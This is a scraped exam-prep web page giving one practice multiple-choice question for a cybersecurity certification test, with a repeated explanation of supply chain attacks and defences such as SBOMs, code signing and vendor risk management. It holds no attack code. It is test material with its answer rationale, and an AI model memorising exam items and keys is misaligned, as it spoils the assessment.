What is a supply chain attack and how can it be mitigated?

Unlock all questions

This demo includes only 20 questions. Upgrade to access hundreds of questions, flashcards, exam simulations, and disable ads.

Full question bankExam simulationsFlashcards
From $24.99Unlock all

Prepare for the Cyber ProKnow AI Test with multiple choice questions, detailed explanations, and tailored study resources. Enhance your skills and confidence to excel in the exam!

Multiple Choice

What is a supply chain attack and how can it be mitigated?

Explanation:
A supply chain attack happens when an attacker compromises software or components during the delivery process, before they reach the end user, so normal products arrive with hidden malware or vulnerabilities. This is about trust in the sources and the build process, not just how a network is attacked or what happens after a device is in hand. The mitigations listed are the right fit because they strengthen every link in that supply chain. An SBOM (Software Bill of Materials) gives a complete list of every component in a product, so you can spot risky or vulnerable pieces. Code signing ensures software is produced by a legitimate source and has not been altered in transit. Trusted repositories reduce the chance of pulling tampered components from unreliable sources. Vendor risk management addresses the broader supplier ecosystem, requiring security controls, monitoring, and contingency plans with third-party partners. Options focusing on network traffic, post-delivery device compromise, or hardware tampering describe other kinds of attacks that don’t capture the essence of compromising software or components before delivery.

A supply chain attack happens when an attacker compromises software or components during the delivery process, before they reach the end user, so normal products arrive with hidden malware or vulnerabilities. This is about trust in the sources and the build process, not just how a network is attacked or what happens after a device is in hand.

The mitigations listed are the right fit because they strengthen every link in that supply chain. An SBOM (Software Bill of Materials) gives a complete list of every component in a product, so you can spot risky or vulnerable pieces. Code signing ensures software is produced by a legitimate source and has not been altered in transit. Trusted repositories reduce the chance of pulling tampered components from unreliable sources. Vendor risk management addresses the broader supplier ecosystem, requiring security controls, monitoring, and contingency plans with third-party partners.

Options focusing on network traffic, post-delivery device compromise, or hardware tampering describe other kinds of attacks that don’t capture the essence of compromising software or components before delivery.

More Multiple Choice Questions
Subscribe

Get the latest from Examzify

You can unsubscribe at any time. Read our privacy policy